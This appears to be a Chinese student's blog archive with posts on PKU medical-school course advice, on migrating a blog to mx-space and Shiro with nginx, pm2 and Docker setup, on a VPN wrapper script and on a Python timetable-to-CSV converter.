数学课的特点就在于,你其实完全不用去听正课,平时依靠教材和教辅自习是完全足够的,参考我在大二修先修课的经历,完全没上过一节线下课的情况下高数拿到了上学期 96.5、下学期 91 的成绩,但是线代因为期中难度太过逆天,所以最后还是 pf 了。

不要寄希望于任何关于数学课会调分的传言,一定要保证自己的卷面分足够高,你才有机会拿到想要的成绩。

计算机基础

计算概论 B 的教学难度不算大,如果你高中有学过 Python 的话,入门 C 应该还算容易,计算概论 B 笔试占分较多,所以期中考试前要多多听课,平时也要多背知识点,以及一些必要的 C 语法都是要掌握的,如 switch/case 等,因为笔试会有代码填空。

至于期末的上机题,更是看你平时作业的完成情况,平时作业最好全都做了,因为期末考试难度和平时作业差不多,我们那年压轴题是一个比较复杂的 dp 动态规划,印象里还有一道 dfs 深度优先搜索,一道图论的附加题,这些题的难度约等于平时作业的最大难度,一些诸如二分的小技巧什么的倒是没有考察。

很多医预新生可能对计算概论的高阶算法都不算重视,如 dfs/dp,都觉得不会考,但是如果想要拿到 90 + 的分数,这些题你平时肯定都是要能自己独立做出来的,平时作业也不会说只有一道,可以在初次见的时候自己琢磨 / 上网抄题解 / 问助教,但是一定要自己尝试并学会基础的递归逻辑啥的你考场上才有机会写出来。

期末考试允许带一张 cheatsheet,可以在大礼包中找到我当年总结的。我当年还总结了所有我们的作业题,可惜印象里没有对题目标号,估计不太容易对上。

计算概论算是算法的入门,但其实和 OI 信息学竞赛的题目相比真的算不上什么,如果你确实想要走信科这条路,打好基础是必要的。

计算机专业课

假设你已经通过了双学位的审核,成功修读上了信双,那么首先请允许我为你道贺。这条路上许多不易,其中艰辛,不足与外人道之,能够坚持下来通过先修课,真的很了不起!

然而,不得不说的是,当你成功修上双学位后,真正的考验才刚刚开始。

如果你想拿到学位,你需要修读 42 个专业课学分,其中必修 30 个学分,选修 12 个学分。

当你修读的时候,你会发现各种各样的困难,其中最显而易见的就是课时冲突问题。由于医学部特有的满课配置,一周五天你都没有时间去本部上课,除了可能开设在晚上的小班课,所以这会极其考验你的自学能力。

尽管如此,CS 的自学难度也并不是不可以克服的,相较于其他专业,CS 已经算是自学资源最丰富的一个专业了,诸如 csdiy 之类的网站提供了极其丰富的自学资源,善加利用可以给你带来极大的帮助。

课业内的话,我很建议多认识几个信科的朋友,从而能够获取到课程的动向以及课后对对答案什么的,这是你跟上课程进度不可或缺的一部分。

一个个人的经验的是,由于我无法去线下听课,所以我会督促自己在专业课的修读过程中尽可能地撰写较高质量的笔记,这个过程可以使用 AI,但一定要加入自己的思考,这样才能达到巩固所学知识的目的。

其他

可以在英语课或者体育课上多认识一些信科的同学,让后从 pyq 看到自己和他们的差距(bushi,也可以在平时问问他们是怎么学的。我就从一位信科卷王哪里受益颇多。

平时也可以自己尝试折腾一些小的计算机项目,如我大一的时候就折腾出来了 PKU-Art(教学网美化样式)、PKU-News(树洞热榜、爬虫)等,这些东西可能会成为你认识信科方面的同学 / 老师的契机,也可以让你在平时精进一些计算机技术,从而更好用于日后的实践与学习当中。

要珍惜在本部的时光,可以很方便的旁听信科的课,如我大一下的时候就会去旁听程设课程,虽然自学也行,但旁听可以算作一种督促,你也可以问问助教老师能不能把你拉到他们的教学网里,尝试做一做他们的作业,这些都是很有用的。

💾

mx-space + Shiro:如纸一般纯净的新博客

2023年9月6日 18:52

壹・为什么要使用 Shiro

其实最开始基于 WordPress + Argon 的博客系统可以正常运作,但前段时间发现因为没有设置缓存插件的原因,我的博客甚至扛不起友人的一次全国测速,当请求数只要高到几十 QPS,即可导致 MySQL 的锁表、高 CPU 和高内存占用,进而导致服务器所有服务均不可用,必须需要强制重启才可以恢复,这无疑是十分离谱的。再加上对于 PHP 的完全不了解,所以我就动了迁移博客的想法。

由于自己人菜瘾大还颜控,所以我为新的博客框架设立了如下要求:

  • 足够好看
  • 可定制,足够好玩
  • 使用的技术栈最好是比较新的,如果能和我的已有技术栈重叠就更好了(方便魔改 hhh)

最开始我盯上了 xLog,它足够好看、好玩,内置的 Markdown 编辑器也很合我的口味,但好不容易折腾完了之后才发现其主站域名在国内已经阻断,且 IPFS 系统导致媒体在国内也不可用,更不必提其每次操作都需要 MetaMask 发起区块链操作这种让我感觉很奇怪的问题,所以在草草同步完几篇现有博文后便又搁置了。

我本想在这个暑假尝试移除 xLog 中和区块链相关的东西并尝试私有化部署,但几经搜索都没找到很好的教程,CONTRIBUTING 看了也感觉帮助不大,所以还是不了了之。

正当我心灰意冷准备还是老老实实回到 WordPress 的怀抱时,我无意中看到了 Innei 大佬在 xLog 上发的文章,并顺藤摸瓜找到了他的主站,从而得知了 mx-space + Shiro 这套系统,进过了解后顿时感到其完美符合我的需求,故开始了迁移的尝试。

贰・踩坑

后端 mx-space

官方网站

仓库地址

采用 Docker 部署,部署过程中按照文档操作即可。我此前从未用过 Docker,属于是纯现学,顺带捡起了之前下过但没有用过的 OrbStack(一个更好看的 Docker Desktop 的替代品)

OrbStack

按照 社区教程,在腾讯云轻量服务器上通过宝塔面板部署后端,并配置反向代理。

Cleanshot-2023-09-06-at-18.12.41

先申请 SSL 证书,选择 Let's Encrypt 证书即可。

然后修改配置文件,添加反向代理配置(不要使用宝塔面板自带的反向代理配置,因为其会导致 WebSocket 建立实时状态链接不可用)。

server
{
    listen 80;
    listen 443 ssl http2;
    server_name api.arthals.ink;
    index index.php index.html index.htm default.php default.htm default.html;
    root /www/wwwroot/api.arthals.ink;


    #SSL-START SSL相关配置,请勿删除或修改下一行带注释的404规则

    #SSL配置隐去

    #SSL-END


    location ~ /purge(/.*) {
        proxy_cache_purge cache_one $host$1$is_args$args;
        #access_log  /www/wwwlogs/api.arthals.ink_purge_cache.log;
    }

    #提升申请SSL证书所需目录的匹配规则到反向代理前,可以保证自动续签SSL证书正常运行
    #一键申请SSL证书验证目录相关设置
    location ~ \.well-known{
        root /www/wwwroot/api.arthals.ink;
        allow all;
    }

    #禁止在证书验证目录放入敏感文件
    if ( $uri ~ "^/\.well-known/.*\.(php|jsp|py|js|css|lua|ts|go|zip|tar\.gz|rar|7z|sql|bak)$" ) {
        return 403;
    }

    #以下为核心配置项,设置反向代理,并设置 Upgrade / Connection 头以启用 WebSocket 链接
    location ~ / {
         proxy_pass http://127.0.0.1:2333;
         proxy_read_timeout 300s;
         proxy_send_timeout 300s;
         #proxy_set_header Host $host;
         proxy_set_header X-Real-IP $remote_addr;
         proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
         proxy_http_version 1.1;
         proxy_set_header Upgrade $http_upgrade;
         proxy_set_header Connection $connection_upgrade;
    }
    #禁止访问的文件或目录
    location ~ ^/(\.user.ini|\.htaccess|\.git|\.svn|\.project|LICENSE|README.md)
    {
        return 404;
    }

    access_log  /www/wwwlogs/api.arthals.ink.log;
    error_log  /www/wwwlogs/api.arthals.ink.error.log;
}

进入后台 - 设定 - 系统 - 网站设置,按照如下配置设定:

Cleanshot-2023-09-06-at-18.23.46

前端地址:https://arthals.ink

管理后台地址:https://api.arthals.ink/qaqdmin

API 地址:https://api.arthals.ink/api/v2

Gateway 地址:https://api.arthals.ink

至此,后端部分完成配置。

前端 Shiro

参考:

基本上按照官方教材配置即可,注意不要使用 Docker 部署,就正常的 pnpm ipnpm build 编译即可,Docker 部署经尝试存在问题。

注意,如果你的机子配置很低(像我一样,2H4G 的最低配置腾讯云轻量服务器),你可能无法在服务器上编译,这时你需要首先在本地编译后,使用 SFTP 推送 .next 文件夹到服务器。

特别地,你可能会发现 .next 文件夹很大(~1G),导致 SFTP 上传很慢,对此你可以通过将实际运行并不需要但却占有极大体积(~700MB)的 .next/cache 文件夹加入到你的 .vscode/sftp.jsonignore 配置项里,从而忽略它,实现加速上传。

服务器进入包含 .next 的文件后,通过 pm2 启动服务:

// ecosystem.config.js
module.exports = {
    apps: [
        {
            name: 'Shiro',
            script: 'npx next start -p 2323',
            instances: 1,
            autorestart: true,
            watch: false,
            max_memory_restart: '180M',
            env: {
                NODE_ENV: 'production',
            },
        },
    ],
};

↑ 此为 pm2 配置文件,请放到 .next 同一文件夹下。

.
├── ecosystem.config.js
└── .next

然后运行 pm2 start 即可启动服务并加入守护进程。

你可以使用 pm2 listpm2 monit 来监视运行状况。

注意对于配置中使用的后端配置 json,前端并非动态绑定的,而是在打包的时候单次请求,所以如果你有任何对于 shiro theme config 的修改,都需要重新编译(以及使用 pm2 重启该服务)。

最后,按照后端的同样配置方式,建站并设置 2323 端口的反向代理即可。

叁・不足

以下为具体使用过程中遇见的问题 / 想要改进的地方,正在抓紧学习 React / Next.js 中,希望能尽快提请 PR 来帮助 Innei 大佬解决 / 改进吧。

  • 不支持定时发布、草稿保存

  • ~~Markdown 不支持 LaTeX 渲染,支持,但需要在 $ $ 和内容间额外加入空格,且不支持块级语法:~~ 都已完全支持。

     $ \lim _{R \rightarrow+\infty} I(R)=0 $
    

    $ \lim _{R \rightarrow+\infty} I(R)=0 $

  • ~~希望 Markdown 支持类似 xLog 一样的实时预览~~,支持,但实测编辑器仍存在 Bug。

  • Github 代码块在网络不佳时无法正常显示

  • ~~后台有新版本的时候的升级提示无法永久关闭(甚至不关闭的话会堆叠)~~ mx-admin 的最新版已解决。

肆・更新

更新前端

如果你有本地更改,你可以参照下述方法更新:

# 进入工作目录
cd /home/ubuntu/Mx-Space/shiro
# 设置代理
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
# 更新
git fetch origin
git merge origin/main --no-gpg-sign -m "merge: sync with latest version"
# git push
pm2 stop Shiro
# 重新安装依赖,打包,部署
nrm use taobao
pnpm i
pnpm build && pnpm prod:pm2

注意,Next.js 打包所需内存较大,如果你的内存不够(≤ 4 GB),请不要尝试在服务端打包,而是在本地打包后上传 .next 文件。另外 git merge 有冲突的时候,你可能需要手动合并。

如果你没有本地更改:

# 进入工作目录
cd /home/ubuntu/Mx-Space/shiro
# 设置代理
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
# 更新
git pull
# git push
pm2 stop Shiro
# 重新安装依赖,打包,部署
nrm use taobao
pnpm i
pnpm build && pnpm prod:pm2

如果你有本地更改:

#!/usr/bin/zsh
cd /home/ubuntu/Mx-Space/shiro
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
git fetch origin

# 检查 package.json 是否有变化
PACKAGE_CHANGED=$(git diff origin/main...HEAD -- package.json)

# 尝试 rebase
git rebase origin/main --no-gpg-sign  || {
    echo "Rebase conflict detected, aborting script."
    exit 1
}

# 如果 package.json 有变化,则重新安装依赖
if [[ $PACKAGE_CHANGED ]]; then
    echo "package.json has changed. Reinstalling dependencies."
    rm -rf ./node_modules/
    pnpm i
else
    echo "package.json has not changed. Skipping dependency installation."
fi

pnpm build && pm2 stop Shiro && pm2 start Shiro

git push -f

更新后端

更新 core,同时更新捆绑的 admin

docker pull innei/mx-server:latest
# 重新运行
docker compose up -d
# 可选,移除旧的镜像
docker images | grep 'innei/mx-server' | grep -v 'latest' | awk '{print $3}' | xargs docker rmi

注意,这只会更新最新的 latest tag 版本,如果你想要体验 alpha 版本,请自行更改 docker pull 指令至对应的 tag 版本。

单独更新 admin

mx-admin 有时候会出现 admin 的跨小版本升级,此时无法通过更新 core 的 docker 版本更新,你可以参照下述方式更新:

首先,前往 Release 页面,找到最新的版本,复制 release.zip 的下载链接,然后:

# 在容器外部下载 release.zip(也可以直接在容器内部下载,如果网络通畅的话)
wget https://github.com/mx-space/mx-admin/releases/download/v3.38.1/release.zip
# 如果是在容器外部下载,将 release.zip 上传到容器内部
docker cp release.zip mx-server:/app
# 进入容器
docker exec -it mx-server /bin/bash
# 进入工作目录
cd /app
# 解压 release.zip,解压出来的应该是 dist 文件夹
unzip release.zip
# 删除旧的 admin 文件夹
rm -rf /app/admin
# 移动新的 admin 文件夹
mv /app/dist /app/admin

如此,即可完成 mx-admin 的手动更新。

💾

卫生统计学,但是小白视角

2023年9月4日 14:50

版权声明

本项目的所有代码部分,以 GPL3 协议开源。其他的部分,以 CC BY-NC-SA 4.0 协议公开。

本项目主要由我个人整理,作业代码有一部分来自于我的室友们,还有部分内容来自于网络以及首都经济贸易大学佟强老师的课件,在此向他们表示感谢。

我对于内容的正确性不做保证,请保持审视的态度使用这份资料。

https://github.com/zhuozhiyongde/Health-Statistics-2022-PKUHSC

个人经验

以下节选于树洞#4591252,可能有个人偏见,如有冒犯,敬请谅解:

卫统教学中有关代码和上机作业的部分真的一言难尽…对我而言,老师教课程尚且不太理解,助教教代码更是很多时候全靠自己 Google/Baidu/CSDN… 助教教作业更多是“给你一段代码,告诉你这段代码能跑出需要的结果”,然后就此结束。连输入输出都没教明白,然后给个样例作业让学生照着抄(还是在统计教的一知半解的情况下),这就算了,最离谱的是,助教还会在你交完作业之后在各种细枝末节找你的不足,接着在diss你没有统计学素养的同时扣你的作业分,问题是在前半学期大多数同学统计学素养并没有那么高,谁能想到每句话都要来一句假设,注意自己的用词,什么不拒绝啥的,真的离谱。

感觉卫统就是,不注重上机教学,但又美名其曰“实践”强加一些代码作业,却完全忽略了大家的代码水平并不高(我自认算是编程比较强的那一批了,却全程感觉学习代码/写作业很迷惑),接着就是在 R 语言教学基础都没有的情况下直接给你上各种函数,这意味着有些常用语法什么的你可能要面对“见都没见过,但要求你写出来”的尴尬,而且我估计有些人可能直到最后连 q d p r 这些函数前缀是干啥的都得挨个去试…

唉,看了一圈说给分也不太行,所幸pf了,就这样吧。

[Eve] 我们级老师上课说:这是一门卫生统计学课,不是编程课

[Francis] 过来人认为,本身就是一门统计理论课,又不是教你写代码

[Grace] 编程不重要,主要这门统计讲的太烂了,毫无条理,内容极其混乱,不适合初学者学习

这门课最大的问题在于,这是3学分的大课,没有PF的话,你必须在有限的时间内完成对于概率论与数理统计部分的知识学习,还要从零开始掌握一些R语言。除此之外,你还必须每周跟上老师的进度,不然小测扣分会直接反映到你的绩点上。

学习历程

  1. 开始不重视,自信自己的编程基础不错,听了两节正态分布的课觉得老师授课较为简单,上课的有效时间比较少;
  2. 发现每周有四小时的上机,一周还带1~2次的小测,没有认真听/自学的话很容易6/10,7/10;
  3. 写作业发现不太会,然后ddl前匆匆照着助教的模板开抄,结果80/100;
  4. 重复如上循环一次,愈发觉得这门课离谱;
  5. 开始下定决心要好好学,于是第三次作业认真写,在细枝末节扣了分,95/100;
  6. 觉得也不是很难,然后因为自己比较摸鱼,开始跟不太上进度;
  7. 上课听着一些别的同学从容应对老师的各种提问,课间热火朝天地讨论老师讲的知识点,自己也不知道他们在讨论啥,但反正觉得这门课自己能应对过去,也就没放在心上;
  8. 上课时,感觉老师讲的太不成体系了,看课本也觉得一样,有关数学推理的部分经常含糊不清跳过,自己不太能串联起知识点的逻辑;
  9. 上课不认真听导致写作业前需要自己“预习”这节课的所有知识点,每次作业都需要花费2h+,一些需要绘制图表的作业还因为强迫症干脆用Python搓了一个三线图HTML生成器;
  10. 后半学期开始用心自学这门课,上课放弃听讲,自学概率论与数理统计,然后从头串联了一遍知识点,感觉虽然模糊,但好歹成了体系;
  11. 考前通宵复习,花了两天总结笔记,过往年题**(选择题重题率比较高的)**;
  12. 考试时选择题用心做,名词解释尽力口胡,大题因为疫情不上机,也算草草完结,最后如愿以偿Pass;
  13. 考后和别的学校学经济的同学吐槽,他给我看了他们的R语言课件,显著感觉优于贵校,人家是真的在教语言(虽然统计学的部分少了许多),感觉俩小时看完他们的课件比自己一学期学的R语言都多;

Tips

  1. 建议自己配置一下R语言在现代编辑器VS Code中使用(谷歌关键词:R in VSCode,Radian),比R Studio的体验好太多,界面优雅,还提供更丰富的自定义配置(如图表输出等),更可以白嫖Copilot的智能提示;
  2. 统计学知识方面,建议配套搭配一本陈希孺院士的《概率论与数理统计》自学,课前预习或者开头看一看PPT;
  3. 软件专心学R足够用了,你完全不用学习STATA、SPSS这些,除非你是GUI爱好者,并且忍受得了这些软件一点都不现代化的界面设计;
  4. 老师课上的嘲讽不要放在心上,也不要焦虑于同学学的如何;
  5. 作业认真写,上课随堂记笔记,建议用电脑敲字,OCR识别课件+自己排版一遍,不仅舒服,更能真的让你系统化学习;
  6. 写作业时,如果你感觉录入数据相当麻烦(一般此时就是助教偷懒没给你们csv文件),你可以学习一下正则表达式 ,搭配VS Code/OCR可以实现快速录入数据;
  7. 如果你和我一样有强迫症,想要绘制电子版三线图,你不必像我一样手搓一个三线图生成器,其实直接用Excel/Numbers调一调样式然后截图一个png放进去就可以了;
  8. 自己整理笔记、写作业的时候,可以顺便学习一下Markdown与LaTeX语法。Markdown编辑软件推荐Typora,实时预览+自定义CSS样式,可以让你写起作业来不仅简单,而且优雅。LaTeX公式推荐使用Mathpix,可以识别课件中的数学公式,而且学生邮箱有100次/月的免费额度,足够使用了。有关这部分的详细说明,请参见 R语言.md

💾

高等数学,学了又学

2023年9月4日 14:47

如果你时间并不多,不想看我的长篇流水账,那你可以直接看文末的经验之谈,但如果你时间充裕并且愿意听我讲一个时长一年半的故事,那不妨慢慢看下去~

https://github.com/zhuozhiyongde/Advanced-Mathematics-B-2022-PKU

2021 年,高开低走的高数 C

回忆去年(似乎已经是前年了)修高数 C 时的场景,彼时的我就对高数颇有兴趣(因为这对我而言是最好学的一门课了,相对普生、普化而言),在开学初就常常抱着书提前老师的进度看,然后超前完成作业,有闲暇时间就看看蓝本/帮高中同学们解解题。

参加高数 C 期中考试时也因为考试前一天晚上刚好在蓝本上看到了考题于是顺风顺水以为能满分,结果因为一个小细节的符号喜提正态。但那时候的我并没有把这个失误放在心上(差一点就满了,这个结果已经足够我向很多朋友们炫耀了,那时的我就是这么想的),慢慢开始松懈,开始旷课,开始跟不上老师的进度,开始在 ddl 前卡线提交作业,开始连课本都看不完...

于是,在这个自己摸鱼 + 其他课开始挤占高数时间的背景下,再面对一张出的并不简单的期末卷子,我理所应当的总评炸掉了(总评 81,期末按总评反算大概 70 左右),但可悲的是,这个打击并没有让我醒悟,我在那个寒假的时候依旧没有对高数有任何的预习/复习,而是终日沉迷游戏之中...

大一下,数 C 来到了级数,我尝试跟上老师的进度,也曾以为自己跟上了老师的进度,直到期中考试,血淋淋的 52 分就这么出现在了我的成绩单上,我的心理准备就这么被直线打穿,想必那时候的我心里只有一个词:「绝望」。

但好在最终,因为北京疫情爆发的缘故,我得以 PF 掉这门课程,侥幸保住了自己的绩点。

「还好,还好」

爆炸的高数 C

2022 年,高数 B

因为打算修软双的缘故,我不得不在这个学期又选了高数 B 这门课。

诚然,相比很多 22 级的同学来说,我修过高数 C 的经历成为了我的显著优势,我可以轻车熟路的捡起那些有关极限的概念和知识,而不是在 $ \epsilon-N $ 语言中晕头转向。但这一次,我记住了去年的教训,没有因为进度领先他人就沾沾自喜,而是听从了一位信科的朋友修高数 A 的经验,选择在掌握课本内容的同时,积极刷课外习题来巩固知识、增强题感。由此,我开始刷起了谢惠民的数学分析参考书。虽然对刷谢惠民的热情大概持续了三周左右便开始因为医学课的增重和自身摸鱼的兴起而渐渐消退,但我还是认为,正是开刷谢惠民,让我得以完全重构了自己并不牢固的高数知识框架,并大幅增强了自己的数列变换、积分水平。

因为课时冲突,我从开学初便没有机会上正课,但我一直保持着每周二晚去旁听 xyt 助教习题课的习惯,也正是 xyt 助教的习题课和他精心制作的讲义,让我在漫无目的地刷 xhm 的同时得以着重关注一些特别的解题技巧和知识点,按照 xyt 助教本人的话来说,就是「你们不必刷谢惠民,我早就把那上面我觉得有用的东西搞到了我的讲义上」,xyt 助教真的是一位人好还有趣的助教,他经常在习题课上讲一些笑话,什么「要不是当年 CMO 最后一题没做出来,我就不在这里了——你问我去哪里,当然是隔壁」之类的 hhh

时光转眼来到期中考试前夕,我陷入了「黑屋洗衣服」的怪圈,高数 B 考试的范围有多离谱大家众所周知,我因为自己从来不听课更是焦虑的要死,看书看不进去、复习谢惠民只是在懊恼「哎呀这题当时看过怎么现在又不会做了!」、往年题刷了一些,均分 60...漫无目的的我打开了树洞,想着看看同学们怎么度过这段时间,没成想发现好多人在问题,我顿时觉得「帮帮同学们」或许是个不错的选择,于是就有了#4255209 里面的一堆题目解答。坦白地说,做这件事情的时候我也想过「为什么要帮我的竞争对手?」,但这个问题的答案也许就是我高中老师所说的那样「你们不是竞争者,而是一起互帮互助的同学」——曾经,我和高中同学们的目标是高考,那现在这个目标就是在数院这个大恶魔手里抢分(bushi

也许正是前一天晚上人品攒的太好了,我成功 AK 了第二天的期中考试,并且取得了我从来没在 P 大拿到的 100 分,要说那时候的我有多兴奋,那其实也不至于,短暂的兴奋过后其实更多是一种如释重负的感觉,「还好,还好,不枉我刷了这多谢惠民,考前熬了这么多个夜」

image-20230904143925682

客观来说,这个满分其实吃了相当大的卷面优势——2022 年的期中是过往几年来最简单的一道题,而我又十分幸运地在考场上把最后一题和 xyt 助教习题课上提到的 $ \int_0^{\frac{\pi}{4}}{ln(1+tant)}dt $ 这道题联系起来了。但其实更戏剧性地是,当我把这套卷子拿给我的舍友看时,他却一眼看出这道题是前年高数 C 一学期的期末题(泊松积分#4257222),但很显然,我考高数 C 时没做出来,考高数 B 的时候也完全不记得了(sad...

期中考试后,我又过上了医学课 + 数学课两边课业都倍增的日子,刷谢惠民的时间又进一步地减少了,11 月因为疫情爆发,我更是直接回家,自身的惰性被放大,愈发摸鱼以至于连 xyt 助教的习题课都难以坚持听完整节课(但其实也有第五章曲面有点太简单的原因),规划好的复习计划也没有按期执行,但一切不幸中的万幸大概就是,考前一天我阳性高烧到 39.7℃,得以缓考了吧。

我大概在考后两天转阴,但望着 2022 所剩不多的日子,逃避的想法又是涌上心头,「2023 再开始复习吧,反正日子还长,内容也不多」,事实证明这完全就是压力转移的方式——2023 年第 1 天到考试有 13 天,我不仅得复习线代还得复习高数,虽然线代我申请了 PF,但是过少的复习时间显然是会导致挂科的风险的。就这样,从 2023 年伊始,我便几乎是每天都在看数学,先看了大概 3 天的谢惠民第七、八章(积分中值、微分学应用),然后不得不掉头开始看线代,直至 8 号线代考完。

8 号考完线代,我又犯起了老毛病——开始摸鱼不学习,浑浑噩噩地度过了一天才惊醒只剩 3 天就要考高数了!!!

于是,我的最后三天几乎过上了「睡醒刷题,刷到睡觉」的日子,作息一度颠倒至东一区,「ddl 是第一生产力」,这句话完美地在我身上得到了验证——3 天时间里,我不仅认真看完了课本剩下的知识,更是在考前 1 天(严格来说,其实直到今天 6 点)连续刷完了 2020 期末、2021 期末、2022A 卷、xyt 助教模拟卷的 4 套卷子...

P 大首个满分

刷完这些题后,我仍像期中前一样毫无保留地将这些都放到了树洞里(#4612715),但做完这些后,我又回到了曾经期中前「黑箱洗衣服」的状态,不想看书、不想回看谢惠民...然而这次和期中不一样的是,因为缓考的人数较少,我甚至都不能像期中前一样借由帮大家解题来打发时间...

于是,考前的最后四个小时,就这么白白浪费在了和同学的吹水以及树洞高强度搜「高数」的无聊行径里(。

就这样,到了 15:00,考试结束。

感谢数院老师,B 卷是一套没有偏题、没有怪题,有一些重题,难度适中的卷子。

至此,我的高数 B 总算暂告一段落。

我的寒假终于开始了。

但我完全没有如我先前预想的那样兴奋,也没有说因为连续熬了 18 个小时就哈欠连连。

无所事事。

那就写点东西吧,希望能帮帮同学们,以及未来的学弟学妹们。

于是,这篇文章出现了。

经验之谈

作为一位曾经经历了一年高数 C 历练、刚刚考完高数 B 的选手,要说谈经验,真的感触良多。

这学期因为人在医学部,所以我其实自始至终一节课都没有听过,能安然度过这个繁重医学课 + 数学课的爆炸学期,我想我真的应该感谢新冠疫情带来的 PF/缓考政策。

对于大多数人而言,高数是进入大学时的第一门「学分多、内容多、教考分离」的课,这几个关键词每个都是这么的让人害怕,但实话来说,我认为高数对我来说,是最接近高中学习生涯的一门课程了。只要平时把书看懂、然后做题,重复这个循环,也不必担心平时分(按时交作业就能给满),也不会有写论文时的搜肠刮肚——会就是会,不会就是不会,一如中学时的数学题。

以下是我的真诚建议:

  1. 课内知识永远是最重要的,认真看一遍课本的优先级是高于一切其他复习手段的。只有细看、看懂课本,你才能真正理解课内知识,并有基础去应对难题。
  2. 如果可以,找个朋友一起学习,你们可以交流往年题,也可以交换彼此的笔记,这些都是很有用的。当然,如果你愿意的话,你可以来加我(社恐真的很欢迎大家来加!)
  3. 无论何时,请记住,你身处北大,在这里并不能像高中一样动动手就名列前茅,高数 B 有 5 个学分,为此多付出一些时间是值得的。作为参考,我的信科同学(高数 A,95+)每周付出 30+小时课余时间,我自己(高数 B)每周付出 20+小时课余时间,考前可以达到每天 9+小时。
  4. 复习资料重要程度优先级(个人感觉,仅作参考):课本>xyt 助教讲义>往年题≈自己平时的笔记>xyt 助教的模拟题>谢惠民等课外习题。
  5. 作为上一条的补充,个人感觉自己做题的技巧,60% 来源 xyt 助教讲义,40% 来源谢惠民。
  6. 如果是文科生,不是对自己的水平有非常大的自信的话,不要不听课。
  7. 如果想要拿到 90+的分数,课外习题是必要的,见识一些超纲的技巧是十分有益于加深课内知识理解、应对考试的。
  8. 作为上一条的补充,来自 xyt 助教的原话「刷谢惠民的边际收益其实很低」。
  9. 考前可以帮树洞里的同学解答一下问题,这不仅是在帮他们,也是在帮自己,不必怀着「我帮了他们我不是要被他们卷掉」这样的心态,就当做是随机考试,测测你自己的能力。
  10. 如果寒假时间允许,不妨预习一下下学期的知识。

终于顺利考完了高数 B,这学期真的对这门课感悟颇多,于是趁着记忆还没有飘散,草草打完了这篇流水账。

期中包括我前年修高数 C、今年修高数 B 的全过程,以及个人总结的一些经验之谈。

就如 #4612715 一样,希望能帮到大家。

💾

PKU VPN - 简洁的校内网访问方式

2023年9月4日 11:29

cover

受够了 Pulse Secure 的丑陋界面、不兼容 ClashX、老是开机重启然后以其巨丑的图标大大咧咧占据我的菜单栏的各种问题,但因为自己技术过菜,也不知道怎么绕过这个程序启动北大 VPN,前段时间在 Github 上看见了 这个项目,下载试了试发现真的可以用,并且完全可以做到和 ClashX 同时开启(同时挂梯子+学校 VPN),于是在此记录一下。

使用须知:在使用前,请确保你已经细心且完全地阅读了此文档,包括 Q&A 部分。

https://github.com/zhuozhiyongde/PKU-VPN

配置方式

  1. clone 本项目到本地,然后更改 startvpn.sh 中的开机密码、IAAA 用户名、IAAA 密码。

  2. 将整个文件夹(保证文件夹命名为 PKU-VPN)复制到你的~/目录下

  3. 在终端输入如下指令:

    echo "\nstartvpn () {\n    exec ~/PKU-VPN/startvpn.sh\n}\nstopvpn () {\n    exec ~/PKU-VPN/stopvpn.sh\n}" >> ~/.zshrc
    

    目的:将 startvpn()stopvpn()两个函数写入你的.zshrc中,方便日后调用。

  4. 在终端输入 brew install openconnect 下载 openconnect 库。

  5. 输入 source ~/.zshrc 重载你的配置。

使用方式

  • 连接 VPN:在终端输入 startvpn,即可。连接过程中需要保持窗口开启。
  • 断开 VPN:首先,使用 ctrl+C 终止 VPN 链接进程。然后重新打开一个终端窗口,输入 stopvpn即可。

Q&A

输入 startvpn后,程序直接终止并退出?

这是因为 startvpn.sh缺少可执行权限所致。请在终端键入:

chmod +x ~/PKU-VPN/startvpn.sh; chmod +x ~/PKU-VPN/stopvpn.sh

如上完成后,即可正常使用。

断开 VPN 后,失去网络连接?

这点原因我尚且不清楚,可能是 openconnect 这个库导致的问题,在实际测试后,我发现只需要断开网络重新连接即可,也正是为此,我比原项目多写了一个 stopvpn.sh 来自动化这个过程(其实质功能就是断开网络、然后重新连接,说实话多少有点无奈)。

如果有大佬知道原因,欢迎联系我以改进这个项目。

Update:根据 pkuvpn#1 ,有可能是 DNS 的问题。

💾

北京大学医学部课表转 Wakeup 课程表导入

2023年9月4日 11:20

前言

由于 Wakeup 课程表并未支持医学部课表的在线导入,故摸此鱼,写了一个 python 脚本来完成转换,从而完成医学部课表导入到 Wakeup 课程表的功能:

使用方法

  1. 登录 医学部门户,然后选择服务大厅 - 我的课表,点选 列表模式,然后依次点击 导出导出文件列表,下载 我的课表.xlsx

  1. 下载 Converter.py ,或直接使用以下代码,将其移动至和课表文件同一目录下,然后运行即可。
# -*- encoding:utf-8 -*-
#@Time		:	2022/08/30 02:01:39
#@File		:	converter.py
#@Author	:	Arthals
#@Contact	:	zhuozhiyongde@126.com
#@Software	:	Visual Studio Code

from openpyxl import Workbook, load_workbook
import os
import re

# wb = Workbook()
# ws = wb.create_sheet('mysheet', 0)
# wb.save('test.xlsx')
# wb.close()

wb = load_workbook('我的课表.xlsx')
ws = wb['sheet1']

maxRow = ws.max_row
maxCol = ws.max_column


def extractInterger(strin):
    return int(re.findall(r'\d+', strin)[0])


def extractWeek(strin):
    strin = re.sub(r"[周()]", "", strin)
    weeks = re.sub(r",", r"、", strin)
    return weeks


def extractDay(strin):
    dayDic = {
        "星期一": 1,
        "星期二": 2,
        "星期三": 3,
        "星期四": 4,
        "星期五": 5,
        "星期六": 6,
        "星期日": 7
    }
    return dayDic[strin]


courseList = []
for row in range(2, maxRow + 1):
    courseName = ws.cell(row=row, column=2).value
    courseStart = extractInterger(ws.cell(row=row, column=8).value)
    courseEnd = extractInterger(ws.cell(row=row, column=9).value)
    courseWeek = extractWeek(ws.cell(row=row, column=6).value)
    courseDay = extractDay(ws.cell(row=row, column=7).value)
    courseLocation = ws.cell(row=row, column=11).value
    courseTeacher = ws.cell(row=row, column=10).value
    courseList.append([
        courseName, courseDay, courseStart, courseEnd, courseTeacher,
        courseLocation, courseWeek
    ])

# print(courseList)

wb.close()

output = open("mySchedule.csv", "w+")
output.write("课程名称,星期,开始节数,结束节数,老师,地点,周数\n")
for course in courseList:
    for info in range(len(course)):
        course[info] = f'"{course[info]}"'
    print(course)
    output.write(",".join('%s' % id for id in (course)) + "\n")
output.close()

注意事项

